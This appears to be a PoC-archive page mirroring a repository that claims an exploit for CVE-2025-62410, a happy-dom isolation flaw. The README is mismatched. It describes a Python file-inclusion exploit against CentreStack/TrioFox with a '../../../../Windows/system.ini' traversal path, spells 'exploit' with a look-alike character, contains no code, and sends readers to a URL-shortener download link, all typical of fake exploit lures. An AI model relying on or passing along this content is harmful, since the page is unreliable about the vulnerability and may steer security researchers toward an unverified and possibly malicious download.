Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-62410 PoC — --disallow-code-generation-from-strings is not sufficient for isolating untrusted JavaScript in happy-dom

Source
https://github.com/SubZeroHackerz/CVE-2025-62410
Associated Vulnerability
Title:--disallow-code-generation-from-strings is not sufficient for isolating untrusted JavaScript in happy-dom (CVE-2025-62410)
Description:In versions before 20.0.2, it was found that --disallow-code-generation-from-strings is not sufficient for isolating untrusted JavaScript in happy-dom. The untrusted script and the rest of the application still run in the same Isolate/process, so attackers can deploy prototype pollution payloads to hijack important references like "process" in the example below, or to hijack control flow via flipping checks of undefined property. This vulnerability is due to an incomplete fix for CVE-2025-61927. The vulnerability is fixed in 20.0.2.
Readme
# CVE-2025-62410

### Overview
The vulnerability allows attackers to run untrusted scripts in the same Isolate/process, potentially enabling prototype pollution attacks that can hijack critical references like "process" or manipulate control flow by exploiting undefined property checks.


### Requirements
- Python 3.8+
- Libraries: requests, argparse (install via `pip install -r requirements.txt`)

### Usage
- Install dependencies: `pip install -r requirements.txt`
- Run the explоit: `python explоit.py --target <target_url> --file "/path/to/Web.config"`

Options:
- `--target`: URL of the vulnerable CentreStack/TrioFox instance.
- `--file`: Relative path to the file to include (e.g., "../../../../Windows/system.ini" for testing).
- `--proxy`: Optional HTTP proxy for anonymization.


### How It Works
Attackers can potentially: - Execute arbitrary code - Hijack critical system references - Manipulate application control flow - Compromise system confidentiality, integrity, and availability The vulnerability allows network-based attacks with no user interaction required, posing a critical risk to system security.



### Ethical Use Warning
- This script is a proof-of-concept for CVE-2025-62410 for educational and authorized security testing purposes.
- **Do not use this script on systems without explicit permission from the system owner.**
- Misuse may violate laws, including the Computer Fraud and Abuse Act (CFAA) in the United States or similar laws elsewhere.
- Always obtain written consent before testing any system.

### Download PoC explоit [here](https://tinyurl.com/muwvnp7a)
File Snapshot

 [4.0K]  /data/pocs/060b0d4a32888a9aad3a89529371d0b769aa1253
└── [1.6K]  README.md

1 directory, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →